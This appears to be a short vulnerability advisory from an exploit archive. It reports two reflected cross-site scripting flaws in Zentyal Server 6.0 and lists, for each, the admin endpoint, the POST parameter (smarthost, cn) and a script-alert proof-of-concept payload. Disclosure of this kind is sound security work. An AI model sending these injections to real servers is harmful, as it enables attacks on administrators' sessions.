Zentyal Server Development Edition 6.0 Cross Site Scripting

2019.02.28
Credit: Ozer Goker
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################################################################################## # Exploit Title: Zentyal Server Development Edition 6.0 | Cross-Site Scripting # Date: 27.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://www.zentyal.org # Software Link: http://download.zentyal.com/zentyal-6.0-development-amd64.iso # Version: 6.0 ################################################################################################################################## Introduction Zentyal Server (formerly eBox Platform) is a commercial unified network server that offers easy and efficient computer network administration for small and medium-size businesses. It can act as a gateway, an infrastructure manager, a unified threat manager, an office server, a unified communication server or a combination of them. These functionalities are tightly integrated, automating most tasks, avoiding mistakes and saving time for system administrators. Zentyal is released under the GNU General Public License (GPL) and runs on top of Ubuntu. ################################################################################# XSS details ################################################################################# XSS1 | Reflected URL https://192.168.2.200:8443/Mail/Controller/SMTPOptions METHOD Post PARAMETER smarthost PAYLOAD <script>alert(1)</script> ################################################################################# XSS2 | Reflected URL https://192.168.2.200:8443/CA/Controller/Certificates METHOD Post PARAMETER cn PAYLOAD <script>alert(2)</script> #################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top